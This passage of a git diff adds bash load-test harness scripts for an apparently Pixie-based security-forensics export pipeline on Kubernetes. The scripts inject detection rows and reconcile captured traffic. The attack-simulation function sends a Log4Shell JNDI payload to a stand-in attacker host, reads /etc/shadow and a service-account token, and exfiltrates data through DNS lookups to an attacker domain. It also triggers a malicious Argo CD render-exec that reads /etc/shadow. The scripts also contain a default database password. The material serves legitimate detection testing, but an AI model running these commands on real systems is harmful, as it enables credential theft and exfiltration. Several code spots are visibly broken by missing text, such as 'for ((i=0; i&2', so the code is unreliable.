jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null)" = Healthy ] && break; sleep 4; done; fi + kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null; } +ae_ok(){ local bad; bad=$(kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null | awk '$3!="Running"{c++} END{print c+0}'); [ "${bad:-1}" -eq 0 ]; } + +# ---- noise (volproof loadgen) ---- +noise(){ if [ "$1" = on ]; then kubectl apply -f /tmp/loadgen.yaml >/dev/null 2>&1; kubectl -n $NS rollout status deploy/volproof-loadgen --timeout=120s >/dev/null 2>&1; say " noise ON (volproof-loadgen)"; + else kubectl -n $NS delete deploy volproof-loadgen --ignore-not-found --wait=false >/dev/null 2>&1; say " noise OFF"; fi; } + +# ---- per-attack workload readiness + fire + R0001 gate ---- +ATTACK="" +ready(){ case "$ATTACK" in + log4shell) kubectl -n $NS get pods --no-headers 2>/dev/null | grep -q '^backend' ;; + argocd) kubectl get ns argocd >/dev/null 2>&1 && kubectl -n argocd get application probe-app >/dev/null 2>&1 ;; + react2argo) kubectl get ns react >/dev/null 2>&1 || kubectl -n default get deploy react >/dev/null 2>&1 ;; + esac; } +fire(){ case "$ATTACK" in + log4shell) + local BIP BPORT BP; BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null) + kubectl -n attacker-ns exec deploy/attacker -- curl -s -m5 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true + BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null | awk '/^backend/{print $1;exit}') + [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; id; cat /etc/shadow 2>/dev/null|head -2; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null|head -c20; D=$(cat /etc/shadow 2>/dev/null|tr -dc "a-z0-9"|head -c90); i=0; while [ $i -lt 5 ]; do C=$(echo "$D"|cut -c$((i*18+1))-$((i*18+18))); getent hosts 
"x${C}.exfil.attacker.attacker-ns.svc.cluster.local" >/dev/null 2>&1; i=$((i+1)); done' >/dev/null 2>&1 || true ;; + argocd) + kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true; sleep 25 + kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true ;; + react2argo) + # (1) react RCE -> steals SA token -> POSTs the malicious argocd Application + # `sys-housekeeping` (sealed trigger, applied verbatim). + kubectl delete job react2shell-trigger -n default --ignore-not-found >/dev/null 2>&1 + kubectl apply -f /tmp/react2argo-trigger.yaml >/dev/null 2>&1 || true + # (2) cache-bust so the render-exec re-fires this rep. The payload is a + # render-exec: argocd-repo-server runs `kustomize build --enable-exec` -> + # ./mal.sh -> reads /etc/shadow (R0001 + R0010 on repo-server) at RENDER + # time. argocd caches rendered manifests in argocd-REDIS; a repo-server + # restart does NOT clear it (verified). Restart argocd-redis to flush the + # manifest cache, then one soft (cache-respecting) reconcile nudge so the + # render re-fires within the rep window. (RCA 2026-06-19.) 
+ kubectl -n argocd rollout restart deploy/argocd-redis >/dev/null 2>&1 + kubectl -n argocd rollout status deploy/argocd-redis --timeout=60s >/dev/null 2>&1 + kubectl -n argocd annotate application sys-housekeeping argocd.argoproj.io/refresh=normal --overwrite >/dev/null 2>&1 || true ;; + esac; } +# acceptance gate: R0001 (unexpected process) seen in the last ~130s (fire window + slack); accepts event_time in unix SECONDS (production unit) or NANOS +r0001_recent(){ chq "SELECT count() FROM forensic_db.kubescape_logs WHERE RuleID='R0001' AND (event_time >= toUInt64(now()-130)*1000000000 OR (event_time < 100000000000 AND event_time >= toUInt64(now()-130)))"; } + +measure(){ local cond=$1 arm=$2 rep=$3 valid=$4 + printf " %-16s %10s %12s\n" table rows bytes | tee -a "$OUT" + while IFS=$'\t' read -r t r b; do [ -z "$t" ] && continue + printf " %-16s %10d %12d\n" "$t" "${r:-0}" "${b:-0}" | tee -a "$OUT" + printf "%s\t%s\t%s\t%s\t%s\t%s\t%s\n" "$cond" "$arm" "$rep" "$t" "${r:-0}" "${b:-0}" "$valid" >> "$RES" + done < <(chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active GROUP BY table ORDER BY table FORMAT TSV") + say " valid=$valid steered=$(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"; } + +run_arm(){ local cond=$1 arm=$2; shift 2 + say "--- $cond ARM $arm : $* ---" + kubectl -n pl set env ds/adaptive-export "$@" >/dev/null 2>&1 + kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1 + # Wait for AE to actually be Running — `rollout status` can return during the + # restart race; retry before aborting so we don't false-abort a healthy roll. + local _i; for _i in 1 2 3 4 5 6 7 8 9; do ae_ok && break; sleep 10; done + if ! ae_ok; then say " ABORT-arm: AE not Running after rollout+90s wait:"; kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null|awk '{print " "$1,$3,$4}'|tee -a "$OUT"; return 1; fi + say " AE OK; vizier=$(ensure_healthy)" + local rep t0 g valid + for rep in $(seq 1 "$REPS"); do + say " $cond $arm rep$rep"; truncate_all; ensure_healthy >/dev/null + t0=$(date +%s); while [ $(( $(date +%s) - t0 )) -lt "$FIREAT" ]; do sleep 2; done + say " FIRE $ATTACK"; fire + while [ $(( $(date +%s) - t0 )) -lt "$RUNSEC" ]; do sleep 2; done; sleep 15 + g=$(r0001_recent); g=${g:-0}; [ "$g" -gt 0 ] && valid=yes || valid="NO(r0001=0)" + measure "$cond" "$arm" "$rep" "$valid" + if [ "$rep" -lt "$REPS" ]; then say " settle ${GAP}s"; sleep "$GAP"; fi + done; return 0; } + +say "===== MATRIX START conds=[$CONDS] REPS=$REPS =====" +for c in $CONDS; do + ATTACK=${c%%:*}; NZ=${c##*:} + say "===== CONDITION $ATTACK noise=$NZ =====" + if ! ready; then say " SKIP — $ATTACK workload not deployed"; continue; fi + noise "$NZ"; sleep 20 + run_arm "$ATTACK/$NZ" ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60 || { noise off; continue; } + say " inter-arm settle ${GAP}s"; sleep "$GAP" + run_arm "$ATTACK/$NZ" DX ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60 || { noise off; continue; } + noise off + say " inter-condition settle ${GAP}s"; sleep "$GAP" +done + +say "===== SUMMARY (mean rows over valid reps, per condition/arm) =====" +for c in $CONDS; do for arm in ALL DX; do for t in http_events dns_events conn_stats pgsql_events; do + m=$(awk -F'\t' -v C="${c%%:*}/${c##*:}" -v A=$arm -v T=$t '$1==C&&$2==A&&$4==T&&$7=="yes"{s+=$5;n++} END{if(n)printf "%.0f",s/n; else print 0}' "$RES") + [ "$m" != 0 ] && say " $c $arm $t mean_rows=$m" +done; done; done +say "===== MATRIX DONE =====" +diff --git 
a/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
new file mode 100755
index 00000000000..a755d783b72
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
@@ -0,0 +1,127 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_row_reconcile.sh — DETERMINISTIC row-level PEM↔CH reconciliation for AE.
+#
+# WHY: count(CH) >= count(PEM) ("write ⊇ read") is NOT proof — CH can be inflated by
+# re-pull dups (C8) while silently MISSING specific rows PEM has. This test proves
+# identity at ROW granularity: every individual row Pixie captured (PEM) was written
+# to forensic_db (CH) with matching values — no loss, no fabrication.
+#
+# HOW: Pixie protocol rows have no native UUID, so we MINT one. Each request carries a
+# unique probe id TAG-i in its URL (TAG = this run's tag, i = request index 0..N-1)
+# → that string is the row's deterministic UUID, visible in http_events.req_path on
+# BOTH sides. We then compare the SET of (uuid|method|status) fingerprints from PEM
+# vs CH. This cleanly separates two layers:
+#   expected (0..N-1) --Pixie capture--> PEM set --AE fidelity--> CH set
+#   - expected \ PEM = Pixie/eBPF didn't capture it (Pixie property, NOT AE)
+#   - PEM \ CH = AE LOST a row Pixie had (← the AE bug we hunt; must be empty)
+#   - CH \ PEM = AE FABRICATED a row Pixie lacked (must be empty; dups are same uuid, not new)
+#   - mismatched fingerprint for same uuid = value corruption (shows as both loss+fab)
+#
+# PASS ⇔ (PEM \ CH) empty AND (CH \ PEM) empty. Runs NODE-SIDE (kubectl + px local).
+set -uo pipefail
+N=${N:-300}; NS=${NS:-log4j-poc}; SVC=${SVC:-frontend}
+CLUSTER=${CLUSTER:-547d0a15-4004-435e-aea1-c13e596eb976}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+SETTLE=${SETTLE:-180} # > two passthrough sweeps (~80s each) + write
+O=/tmp/rowrec; mkdir -p "$O"
+# chq SQL — run SQL through clickhouse-client inside the ClickHouse pod (stderr dropped).
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# pxrun relies on the persisted `px auth login` session (auth.json); PX_CLOUD_ADDR is non-secret.
+pxrun(){ PX_CLOUD_ADDR="$(grep -E '^PX_CLOUD_ADDR=' /tmp/pixie-keys.env 2>/dev/null | cut -d= -f2-)"; export PX_CLOUD_ADDR
+  px run -f "$1" -c "$CLUSTER" 2>&1 | grep -ivE "PX_|ENV VARS|^\*|Pixie CLI|Cloud|^$|resump"; }
+
+FE=$(kubectl -n "$NS" get svc "$SVC" -o jsonpath='{.spec.clusterIP}')
+FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods -l app="$SVC" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)"
+[ "$FEPOD_NSP" = "$NS/" ] && FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods --no-headers 2>/dev/null | awk '/^'"$SVC"'/{print $1; exit}')"
+# Fail fast: without a target address or pod every later step runs to completion
+# (minutes of settling) and then reports a FAIL that says nothing about AE.
+[ -n "$FE" ] || { echo "FATAL: cannot resolve ClusterIP of svc/$SVC in ns $NS" >&2; exit 1; }
+[ "$FEPOD_NSP" != "$NS/" ] || { echo "FATAL: no pod found for $SVC in ns $NS" >&2; exit 1; }
+TAG="rr$(date +%s)" # unique run tag → isolates THIS run's rows (clock-skew-proof)
+echo "TAG=$TAG N=$N target=$FEPOD_NSP fe=$FE" | tee "$O/meta.txt"
+
+# 0. Put AE in passthrough so it captures the frontend (write-fidelity test, not gating).
+kubectl -n pl set env ds/adaptive-export ADAPTIVE_PASSTHROUGH=true ADAPTIVE_PASSTHROUGH_WINDOW_SEC=240 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=20 ADAPTIVE_PUSH_PIXIE_ROWS=false >/dev/null 2>&1
+kubectl -n pl rollout status ds/adaptive-export --timeout=140s >/dev/null 2>&1
+sleep 40 # AE reconnect warm
+
+# 1. Fire N uniquely-tagged requests from a gen pod (gen client may be untraced; we read
+# the TRACED frontend SERVER-side, so every request shows up as one http_events row).
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=true >/dev/null 2>&1
+kubectl -n "$NS" run rowgen --image=busybox:1.36 --restart=Never --command -- \
+  sh -c "for i in \$(seq 0 $((N-1))); do wget -qO- 'http://$FE/api/products?probe=$TAG-'\$i >/dev/null 2>&1; done; echo ROWGEN_DONE; sleep 3600"
+# Poll the pod log for the sentinel. The log is captured first and matched in the
+# shell: `kubectl logs | grep -q` under `pipefail` can report failure when grep
+# exits early and the writer is killed by SIGPIPE.
+rowgen_done=0
+for _ in $(seq 1 90); do
+  case "$(kubectl -n "$NS" logs rowgen 2>/dev/null)" in *ROWGEN_DONE*) rowgen_done=1; break;; esac
+  sleep 2
+done
+[ "$rowgen_done" = 1 ] || echo "WARN: rowgen did not report ROWGEN_DONE within 180s — reconcile may run on a partial request set" | tee -a "$O/meta.txt"
+echo "fired $N requests; settling ${SETTLE}s for AE to sweep+write" | tee -a "$O/meta.txt"
+sleep "$SETTLE"
+
+# 2. PEM fingerprints: (uuid|method|status) Pixie captured for the frontend, filtered by TAG.
+cat > "$O/pem.pxl" < "$O/pem.raw"
+grep -oE "$TAG-[0-9]+" "$O/pem.raw" | sort -u > "$O/pem.uuids"
+# Build fingerprint uuid|method|status from each PEM line (parse around the probe token).
+# The result goes through the same `sort -u` as the CH side so that both files share
+# one collation order — `comm` requires identically sorted inputs.
+python3 - "$O/pem.raw" "$TAG" <<'PY' | sort -u > "$O/pem.fp"
+import sys,re
+tag=sys.argv[2]
+probe=re.compile(re.escape(tag)+r"-(\d+)")
+seen=set()
+for ln in open(sys.argv[1]):
+    m=probe.search(ln)
+    if not m: continue
+    meth="GET" if "GET" in ln else "?"
+    # Look for the status with the probe token blanked out: its numeric index
+    # (e.g. "-150") would otherwise satisfy the 3-digit status pattern.
+    st=re.search(r"\b([1-5]\d\d)\b",probe.sub(" ",ln)); st=st.group(1) if st else "?"
+    seen.add(f"{tag}-{m.group(1)}|{meth}|{st}")
+for fp in seen: print(fp)
+PY
+
+# 3. CH fingerprints: what AE actually wrote (distinct, dedup'd) for the same TAG.
+chq "SELECT DISTINCT concat(extract(req_path,'($TAG-[0-9]+)'),'|',req_method,'|',toString(resp_status))
+     FROM forensic_db.http_events
+     WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'
+     ORDER BY 1 FORMAT TSV" 2>/dev/null | grep -E "$TAG-[0-9]+\|" | sort -u > "$O/ch.fp"
+grep -oE "$TAG-[0-9]+" "$O/ch.fp" | sort -u > "$O/ch.uuids"
+CH_TOTAL=$(chq "SELECT count() FROM forensic_db.http_events WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'")
+CH_TOTAL=${CH_TOTAL:-0} # a failed query must not break the dup-factor division below
+
+# 4. Reconcile.
+seq 0 $((N-1)) | sed "s/^/$TAG-/" | sort -u > "$O/expected.uuids"
+LOSS=$(comm -23 "$O/pem.fp" "$O/ch.fp" | wc -l) # in PEM not CH = AE LOST (must be 0)
+FAB=$(comm -13 "$O/pem.fp" "$O/ch.fp" | wc -l) # in CH not PEM = AE FABRICATED/value-mismatch (must be 0)
+MATCH=$(comm -12 "$O/pem.fp" "$O/ch.fp" | wc -l)
+PIXIE_MISS=$(comm -23 "$O/expected.uuids" "$O/pem.uuids" | wc -l) # Pixie didn't capture (NOT AE)
+PEM_U=$(wc -l < "$O/pem.uuids"); CH_U=$(wc -l < "$O/ch.uuids")
+DUP="n/a"; [ "$CH_U" -gt 0 ] && DUP=$(awk -v t="$CH_TOTAL" -v u="$CH_U" 'BEGIN{printf "%.2f", t/u}')
+
+{
+echo "================ ROW-LEVEL RECONCILE (TAG=$TAG, N=$N) ================"
+echo "Pixie captured (PEM distinct uuids): $PEM_U / $N (expected\\PEM = $PIXIE_MISS not captured by eBPF)"
+echo "AE wrote (CH distinct uuids): $CH_U (CH total rows=$CH_TOTAL → dup factor ${DUP}x)"
+echo "fingerprint matched (uuid|method|status): $MATCH"
+echo "AE LOSS (PEM\\CH, MUST be 0): $LOSS"
+echo "AE FAB (CH\\PEM, MUST be 0): $FAB"
+[ "$LOSS" -gt 0 ] && { echo '--- LOST rows (Pixie had, AE did NOT write): ---'; comm -23 "$O/pem.fp" "$O/ch.fp" | head -20; }
+[ "$FAB" -gt 0 ] && { echo '--- FABRICATED/mismatched rows (in CH, not in PEM): ---'; comm -13 "$O/pem.fp" "$O/ch.fp" | head -20; }
+if [ "$LOSS" -eq 0 ] && [ "$FAB" -eq 0 ] && [ "$PEM_U" -gt 0 ]; then
+  echo "VERDICT: PASS — every row Pixie captured was written to CH with matching values."
+else
+  echo "VERDICT: FAIL — AE write-set != Pixie read-set at row granularity."
+fi
+} | tee "$O/RESULT.txt"
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=false >/dev/null 2>&1
+# Exit status mirrors the verdict (0 = PASS, non-zero = FAIL) so callers can gate on it.
+grep -q '^VERDICT: PASS' "$O/RESULT.txt"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/inject.sh b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
new file mode 100755
index 00000000000..df6de5219c1
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
@@ -0,0 +1,109 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# inject.sh — inject controlled kubescape_logs trigger rows into ClickHouse over
+# the HTTP interface, with EXACT control over event_time. This is the only AE
+# input under test: real kubescape is NOT deployed for these load-tests.
+#
+# Row shape mirrors exactly what Vector emits (and what AE's trigger polls):
+# BaseRuntimeMetadata, CloudMetadata, RuleID, RuntimeK8sDetails (JSON string
+# with podName/podNamespace), RuntimeProcessDetails (JSON string with
+# processTree.pid/comm), event, event_time (UInt64 unix SECONDS — see
+# "Timestamp discipline" below), hostname.
+#
+# anomaly_hash = SHA256(pid, comm, pod, namespace)[:16] is computed by AE — NOT
+# set here — so per-rep uniqueness comes from a unique --pod (data plane) and a
+# unique --hostname (control plane; trigger_watermark is partitioned by host).
+#
+# Timestamp discipline (PRODUCTION UNIT = SECONDS):
+# event_time is unix SECONDS — the unit the soc Vector kubescape sink emits
+# (`to_unix_timestamp(ts)`, VRL default seconds) and what the CH DDL's
+# `toDateTime(event_time)` TTL/PARTITION assume. (The AE trigger auto-detects
+# s/ms/ns, but the DDL only handles seconds — so fixtures MUST be seconds or
+# the rows are TTL-deleted; see FINDINGS_AND_BACKLOG.md F1/AE-2.)
+# --event-time is the FIRST row's event_time (unix SECONDS). With --count N>1
+# the rows get event_time, event_time+dt, ... (--dt-s, default 1s) so they are
+# DISTINCT + monotone and never collide at the watermark boundary — UNLESS
+# --same-time is given, which deliberately reuses one event_time to exercise
+# the boundary-fingerprint dedup (experiment E4).
+set -euo pipefail
+
+ENDPOINT="${CH_ENDPOINT:-http://localhost:8123}"
+CH_USER="${CH_USER:-}"
+CH_PASS="${CH_PASS:-}"
+NS="" ; POD="" ; RULE="R0001" ; PID="1234" ; COMM="java"
+EVENT_TIME="" ; HOSTNAME_="" ; COUNT=1 ; DT_S=1 ; SAME_TIME=0
+ALERT=""
+
+# usage [EXIT_CODE] — print this file's comment lines as help text, then exit.
+usage(){ grep '^#' "$0" | sed 's/^# \{0,1\}//' ; exit "${1:-0}"; }
+
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    --endpoint) ENDPOINT="$2"; shift 2;;
+    --user) CH_USER="$2"; shift 2;;
+    --pass) CH_PASS="$2"; shift 2;;
+    --ns) NS="$2"; shift 2;;
+    --pod) POD="$2"; shift 2;;
+    --rule) RULE="$2"; shift 2;;
+    --pid) PID="$2"; shift 2;;
+    --comm) COMM="$2"; shift 2;;
+    --event-time) EVENT_TIME="$2"; shift 2;;
+    --hostname) HOSTNAME_="$2"; shift 2;;
+    --count) COUNT="$2"; shift 2;;
+    --dt-s) DT_S="$2"; shift 2;;
+    --same-time) SAME_TIME=1; shift;;
+    --alert) ALERT="$2"; shift 2;;
+    -h|--help) usage 0;;
+    *) echo "inject.sh: unknown arg $1" >&2; usage 1;;
+  esac
+done
+
+[[ -n "$NS" && -n "$POD" && -n "$EVENT_TIME" && -n "$HOSTNAME_" ]] || {
+  echo "inject.sh: --ns --pod --event-time --hostname are required" >&2; exit 2; }
+[[ -n "$ALERT" ]] || ALERT="$RULE"
+
+# --event-time / --count / --dt-s are stepped arithmetically (see the header), and
+# bash arithmetic treats a non-numeric string as a variable name instead of
+# rejecting it, so insist on plain non-negative integers before building any row.
+for _opt in EVENT_TIME COUNT DT_S; do
+  [[ "${!_opt}" =~ ^[0-9]+$ ]] || {
+    echo "inject.sh: ${_opt} must be a non-negative integer (got '${!_opt}')" >&2; exit 2; }
+done
+[[ "$COUNT" -ge 1 ]] || { echo "inject.sh: --count must be >= 1" >&2; exit 2; }
+
+# Build the JSONEachRow body.
RuntimeK8sDetails / RuntimeProcessDetails are +# JSON-STRING columns, so their inner quotes are escaped (\"). event_time is +# unix SECONDS; --count rows step by DT_S seconds (distinct, monotone). +body="" +for ((i=0; i&2 + cat /tmp/inject_resp.$$ >&2 || true + rm -f /tmp/inject_resp.$$ + exit 1 +fi +rm -f /tmp/inject_resp.$$ +echo "inject.sh: OK count=${COUNT} ns=${NS} pod=${POD} rule=${RULE} host=${HOSTNAME_} t0=${EVENT_TIME} same_time=${SAME_TIME}" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/lib.sh b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh new file mode 100755 index 00000000000..680b694975a --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh @@ -0,0 +1,216 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# lib.sh — shared helpers for the AE fixture-isolation load-tests (L3, live rig). +# +# Connectivity model (per the labctl-session-discipline rule): all kubectl runs +# LOCALLY over the tailscale-direct kubeconfig (make kubeconfig), and ClickHouse +# is reached over a local port-forward — NO long-held labctl ssh sessions. 
+#
+# Required env (export before sourcing or pass through):
+# KUBECONFIG tailscale-direct kubeconfig for the rig (make kubeconfig)
+# AELOAD_IMAGE ttl.sh/aeload-TAG:24h (built on the PG dev-machine)
+# Optional:
+# CH_NS (default clickhouse), AE_NS (default pl), AELOAD_NS (default aeload)
+# CH_HTTP (default http://127.0.0.1:8123 via the port-forward this lib opens)
+# CH_RO_USER / CH_RO_PASS (SELECT creds; default = empty → default user)
+# CH_RW_USER / CH_RW_PASS (INSERT creds; default ingest_writer/changeme-ingest)
+set -uo pipefail
+
+CH_NS="${CH_NS:-clickhouse}"
+AE_NS="${AE_NS:-pl}"
+AELOAD_NS="${AELOAD_NS:-aeload}"
+CH_HTTP="${CH_HTTP:-http://127.0.0.1:8123}"
+CH_RO_USER="${CH_RO_USER:-}"
+CH_RO_PASS="${CH_RO_PASS:-}"
+CH_RW_USER="${CH_RW_USER:-ingest_writer}"
+CH_RW_PASS="${CH_RW_PASS:-changeme-ingest}"
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+K8S_DIR="$(cd "$HERE/../k8s" && pwd)"
+
+_PF_PID=""
+
+# die MSG — log MSG to stderr and exit 1. log MSG — log MSG to stderr.
+die(){ echo "[aeload] FATAL: $*" >&2; exit 1; }
+log(){ echo "[aeload] $*" >&2; }
+
+# k — kubectl over the tailscale kubeconfig.
+k(){ kubectl "$@"; }
+
+# ch_svc — resolve the ClickHouse service name (first svc exposing 8123).
+ch_svc(){
+  k -n "$CH_NS" get svc -o jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.ports[*].port}{"\n"}{end}' \
+    | awk '/8123/{print $1; exit}'
+}
+
+# ch_portforward_up — start a background port-forward 8123 -> CH HTTP.
+# Set CH_NO_PF=1 when running LAB-SIDE (on the PG dev-machine): there kubectl is
+# native and ClickHouse is reachable in-cluster, so point CH_HTTP straight at the
+# service (e.g. http://SVC.NS.svc:8123) and skip the forward entirely. This
+# is the disciplined path — no long-held labctl ssh / no tailnet dependency.
+ch_portforward_up(){
+  if [[ "${CH_NO_PF:-0}" == "1" ]]; then
+    # Auto-fill CH_HTTP from the in-cluster service if left at the default.
+    if [[ "$CH_HTTP" == "http://127.0.0.1:8123" ]]; then
+      local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+      CH_HTTP="http://${svc}.${CH_NS}.svc:8123"
+    fi
+    log "lab-side mode: CH_HTTP=$CH_HTTP (no port-forward)"
+    curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 || die "CH not reachable at $CH_HTTP"
+    return 0
+  fi
+  local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+  log "port-forward svc/$svc 8123 (ns $CH_NS)"
+  k -n "$CH_NS" port-forward "svc/$svc" 8123:8123 >/tmp/aeload-pf.log 2>&1 &
+  _PF_PID=$!
+  for _ in $(seq 1 30); do
+    curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 && { log "port-forward ready"; return 0; }
+    sleep 0.5
+  done
+  die "port-forward to CH did not become ready (see /tmp/aeload-pf.log)"
+}
+# ch_portforward_down — stop the background port-forward, if one was started.
+ch_portforward_down(){ [[ -n "$_PF_PID" ]] && kill "$_PF_PID" 2>/dev/null || true; }
+trap ch_portforward_down EXIT
+
+# chq SQL — run a read query, return the raw result (default user / RO creds).
+chq(){
+  local sql="$1" auth=()
+  [[ -n "$CH_RO_USER" ]] && auth=(-u "${CH_RO_USER}:${CH_RO_PASS}")
+  # ${auth[@]+...}: with `set -u`, bash older than 4.4 treats expanding an EMPTY
+  # array as an unbound variable, which would abort every query run as the
+  # default user.
+  curl -sS ${auth[@]+"${auth[@]}"} --data-binary "$sql" "$CH_HTTP/" 2>/dev/null
+}
+
+# count_pod TABLE UNIQ — rows in forensic_db.TABLE for this rep's pod
+# (globally-unique pod name → safe LIKE). Returns an integer (0 if table/rows absent).
+count_pod(){
+  local table="$1" uniq="$2"
+  local n; n="$(chq "SELECT count() FROM forensic_db.${table} WHERE pod LIKE '%${uniq}%'" )"
+  # chq hands back the HTTP body even for an error reply; only a plain integer is
+  # a count — the digits inside an error message must not be read as one.
+  [[ "$n" =~ ^[0-9]+$ ]] || n=0
+  printf '%s' "${n:0:18}"
+}
+
+# NOTE: the live AE DaemonSet polls kubescape_logs WHERE hostname=NODE,
+# so every injected fixture's hostname MUST be a real node. Per-rep isolation is
+# therefore by UNIQUE POD (distinct anomaly_hash), not by hostname. The helpers
+# below scope to (hostname=node, pod LIKE the rep's unique pod). adaptive_
+# attribution stores the BARE pod name (kubescape podName), unlike the protocol
+# tables whose pod is "NS/POD" (upid_to_pod_name).
+
+# attrib_count NODE POD — adaptive_attribution rows (FINAL) for a rep.
+attrib_count(){ + local node="$1" pod="$2" n + n="$(chq "SELECT count() FROM (SELECT 1 FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod LIKE '%${pod}%')")" + echo "${n:-0}" | tr -dc '0-9' | head -c 18 +} +uniq_hashes(){ + local node="$1" pod="$2" n + n="$(chq "SELECT uniqExact(anomaly_hash) FROM forensic_db.adaptive_attribution WHERE hostname='${node}' AND pod LIKE '%${pod}%'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 18 +} +# watermark_of — current trigger watermark for that node (monotone across +# reps that share a node; equals the most-recently-injected event_time). +watermark_of(){ + local node="$1" n + n="$(chq "SELECT watermark FROM forensic_db.trigger_watermark FINAL WHERE hostname='${node}' AND table_name='kubescape_logs'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 20 +} + +# attr_field — read one adaptive_attribution FINAL +# column (e.g. n_anomalies, toUnixTimestamp(last_seen)) for a single pod. +attr_field(){ + local node="$1" pod="$2" field="$3" n + n="$(chq "SELECT ${field} FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod='${pod}'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 20 +} + +# first_node — a real schedulable node name (fixture hostname for control-plane +# experiments). nodes_list — all node names, newline-separated. +nodes_list(){ k get nodes -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}'; } +first_node(){ nodes_list | head -n1; } + +# now_ns — wall-clock unix nanoseconds (unique-name suffix only). +now_ns(){ date +%s%N; } +# now_s — wall-clock unix SECONDS = the production event_time unit (soc Vector +# emits seconds; the CH DDL TTL/PARTITION assume seconds). ALL fixtures use this. +now_s(){ date +%s; } + +# warmup — absorb the AE trigger cold-start on a node. 
The very first
+# poll after AE boots only establishes the watermark baseline, so the first
+# real event for a fresh hostname can be missed; a throwaway injection +
+# settle primes the per-node trigger so measured reps are steady-state.
+warmup(){
